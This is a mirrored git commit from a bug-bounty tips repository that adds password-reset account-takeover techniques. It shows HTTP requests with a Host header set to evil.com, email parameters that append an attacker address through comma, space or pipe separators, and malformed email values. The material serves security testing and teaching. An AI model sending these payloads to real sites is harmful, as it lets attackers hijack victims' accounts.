mirror of
https://github.com/daffainfo/AllAboutBugBounty.git
synced 2024-12-18 18:36:12 +00:00
Account Takover [2]
Add 3 tips
This commit is contained in:
parent
4e7af26eb2
commit
35198d15d7
@ -21,4 +21,35 @@ Host: evil.com
|
||||
[...]
|
||||
email=victim@mail.com
|
||||
```
|
||||
And the victim will receive the reset link with your evil.com
|
||||
And the victim will receive the reset link with evil.com
|
||||
|
||||
4. Using separator in value of the parameter
|
||||
```
|
||||
POST /reset
|
||||
[...]
|
||||
email=victim@mail.com,hacker@mail.com
|
||||
```
|
||||
```
|
||||
POST /reset
|
||||
[...]
|
||||
email=victim@mail.com%20hacker@mail.com
|
||||
```
|
||||
```
|
||||
POST /reset
|
||||
[...]
|
||||
email=victim@mail.com|hacker@mail.com
|
||||
```
|
||||
|
||||
5. No domain in value of the paramter
|
||||
```
|
||||
POST /reset
|
||||
[...]
|
||||
email=victim
|
||||
```
|
||||
|
||||
6. No TLD in value of the paramter
|
||||
```
|
||||
POST /reset
|
||||
[...]
|
||||
email=victim@mail
|
||||
```
|
||||
|
Loading…
Reference in New Issue
Block a user